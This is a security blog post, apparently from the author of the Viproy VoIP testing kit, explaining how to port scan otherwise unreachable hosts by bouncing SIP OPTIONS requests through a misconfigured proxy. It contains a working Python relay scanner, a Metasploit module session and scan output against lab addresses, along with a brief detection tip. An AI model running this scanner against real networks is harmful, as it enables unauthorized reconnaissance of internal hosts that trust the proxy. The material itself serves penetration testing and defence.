Port scanning is an important phase of network mapping; every later attack and all of the information we collect depend on it. It matters even more when discovering VoIP networks, because their trust infrastructure is UDP and IP address based. A UDP scan can find network services and SIP services, but only on servers that are directly reachable from the scanner. We need more than that to execute SIP trust based attacks.
However, a simple technique helps us discover SIP servers that are not directly accessible. A SIP proxy routes a request to the host named in its Request-URI: when the request line contains "sip:HOST:PORT", the proxy tries to forward the request to HOST on PORT. If HOST answers, the proxy relays HOST's response back to us; if it does not, the proxy generates a timeout error. We can use this behaviour to scan servers we cannot reach ourselves, such as trusted servers, 3rd party servers and private gateway services. Two points are worth keeping in mind: only a proxy that forwards requests for arbitrary Request-URIs without requiring authentication is usable as a relay, and from the target's point of view the request arrives from the proxy, which is often exactly the host it trusts.
I developed a PoC scanning module that scans 3rd party servers through SIP proxies. It is useful for UDP based SIP server discovery, and it reports the accessible servers, their open ports and the SIP service software running on them. I prepared a demo: the scanning module is used to discover the ports of 192.168.1.146 and 192.168.1.203 through the vulnerable SIP proxy at 192.168.1.145, scanning a port range on each target host.
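The following Python script is an added example of the relay technique described above; it is not part of the original post and not code from the Viproy kit. It builds a SIP OPTIONS request whose Request-URI names the target rather than the proxy, sends it to the proxy over UDP, and classifies what the proxy relays back. Addresses, the 408/503 "no answer from target" rule, and the `proxy_banner` comparison (scan the proxy itself first and pass its own Server/User-Agent value, so that errors the proxy generates itself are not mistaken for a live target) are assumptions for illustration; the sample responses in the comments are constructed.

```python
import re
import socket
import uuid

STATUS_RE = re.compile(rb"^SIP/2\.0 (\d{3}) (.*?)\r\n", re.S)


def build_options_request(target_host, target_port, local_host, local_port, call_id=None):
    """Build a SIP OPTIONS request whose Request-URI names the *target*, not the proxy
    the datagram is actually sent to. A proxy that routes on the Request-URI forwards
    it to target_host:target_port and relays whatever comes back to our Via address."""
    call_id = call_id or uuid.uuid4().hex
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]   # RFC 3261 magic cookie prefix
    lines = [
        f"OPTIONS sip:{target_host}:{target_port} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_host}:{local_port};branch={branch};rport",
        f"From: <sip:scanner@{local_host}>;tag={uuid.uuid4().hex[:8]}",
        f"To: <sip:{target_host}:{target_port}>",
        f"Call-ID: {call_id}@{local_host}",
        "CSeq: 1 OPTIONS",
        f"Contact: <sip:scanner@{local_host}:{local_port}>",
        "Max-Forwards: 70",
        "Accept: application/sdp",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def classify_response(data, proxy_banner=None):
    """Turn the raw bytes relayed by the proxy into (verdict, detail).

    Assumptions (illustrative, not a protocol guarantee):
      - no datagram at all, or a 408/503, means the proxy got nothing from the target;
      - a response whose Server/User-Agent equals the proxy's own banner was generated
        by the proxy (e.g. 403 for a forbidden destination), not by the target;
      - anything else came from the target and marks the port open."""
    if not data:
        return ("closed/filtered", None)
    m = STATUS_RE.match(data)
    if not m:
        return ("unknown", None)
    code = int(m.group(1))
    reason = m.group(2).decode(errors="replace").strip()
    banner = None
    for header in ("Server", "User-Agent"):
        hm = re.search(rb"\r\n" + header.encode() + rb":[ \t]*([^\r\n]*)\r\n", data, re.I)
        if hm:
            banner = (header, hm.group(1).decode(errors="replace").strip())
            break
    if code in (408, 503):
        return ("closed/filtered", f"{code} {reason}")
    if proxy_banner and banner and banner[1] == proxy_banner:
        return ("proxy-generated", f"{code} {reason}")
    return ("open", f"{banner[0]}: {banner[1]}" if banner else f"{code} {reason}")


def scan_via_proxy(proxy_host, proxy_port, targets, ports, local_host, local_port=5091,
                   timeout=3.0, proxy_banner=None):
    """Probe every target:port through the proxy; one UDP socket, one request at a time.
    local_host must be the address the proxy can reach, since it goes into the Via header."""
    results = {}
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((local_host, local_port))
    sock.settimeout(timeout)
    try:
        for host in targets:
            for port in ports:
                req = build_options_request(host, port, local_host, local_port)
                sock.sendto(req, (proxy_host, proxy_port))
                try:
                    data, _ = sock.recvfrom(65535)
                except socket.timeout:
                    data = b""          # proxy never relayed anything back
                results[(host, port)] = classify_response(data, proxy_banner)
    finally:
        sock.close()
    return results


if __name__ == "__main__":
    # Hypothetical lab addresses mirroring the demo; adjust local_host to your own IP.
    for (host, port), (verdict, detail) in scan_via_proxy(
            "192.168.1.145", 5060, ["192.168.1.146", "192.168.1.203"],
            range(5058, 5063), local_host="192.168.1.100").items():
        print(f"{host}:{port} {verdict} {detail or ''}")
```

Because every probe leaves the proxy's own address as the source the target sees, a SIP-aware IDS on the target side will only ever log the proxy; the place to detect this is on the proxy, by alerting on OPTIONS requests whose Request-URI host is not one the proxy is configured to serve.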
Viproy VoIP Penetration and Exploitation Kit - Github Page
http://github.com/fozavci/viproy-voipkit
http://www.viproy.com/voipkit
msf auxiliary(vsipportscan-options) > show options
Module options (auxiliary/scanner/sip/vsipportscan-options):
Name             Current Setting              Required  Description
----             ---------------              --------  -----------
CHOST            192.168.1.100                no        The local client address
CPORT            5091                         no        The local client port
RHOSTS           192.168.1.146 192.168.1.203  yes       IP Range for UDP Port Scan
RPORTS           5060-5065                    yes       Port Range for UDP Port Scan
SIP_SERVER_IP    192.168.1.145                yes       Vulnerable SIP Server IP
SIP_SERVER_PORT  5060                         yes       Vulnerable SIP Server Port
THREADS          1                            yes       The number of concurrent threads
msf auxiliary(vsipportscan-options) > set RPORTS 5058-5062
RPORTS => 5058-5062
msf auxiliary(vsipportscan-options) > set VERBOSE true
VERBOSE => true
msf auxiliary(vsipportscan-options) > run
[*] Starting SIP Socket on 192.168.1.100:5091
[*] Sending Packet for 192.168.1.146:5058
[*] 192.168.1.146 5058 is Close/Filtered
[*] Sending Packet for 192.168.1.146:5059
[*] 192.168.1.146 5059 is Close/Filtered
[*] Sending Packet for 192.168.1.146:5060
[+] 192.168.1.146 5060 is Open
Server : FPBX-2.11.0beta2(11.2.1)
[*] Sending Packet for 192.168.1.146:5061
[*] 192.168.1.146 5061 is Close/Filtered
[*] Sending Packet for 192.168.1.146:5062
[*] 192.168.1.146 5062 is Close/Filtered
[*] Sending Packet for 192.168.1.203:5058
[*] 192.168.1.203 5058 is Close/Filtered
[*] Sending Packet for 192.168.1.203:5059
[*] 192.168.1.203 5059 is Close/Filtered
[*] Sending Packet for 192.168.1.203:5060
[+] 192.168.1.203 5060 is Open
User-Agent : 3CXPhoneSystem 11.0.28976.849 (28862)
[*] Sending Packet for 192.168.1.203:5061
[*] 192.168.1.203 5061 is Close/Filtered
[*] Sending Packet for 192.168.1.203:5062
[*] 192.168.1.203 5062 is Close/Filtered
[*] Stopping SIP Sockets...
[*] Auxiliary module execution completed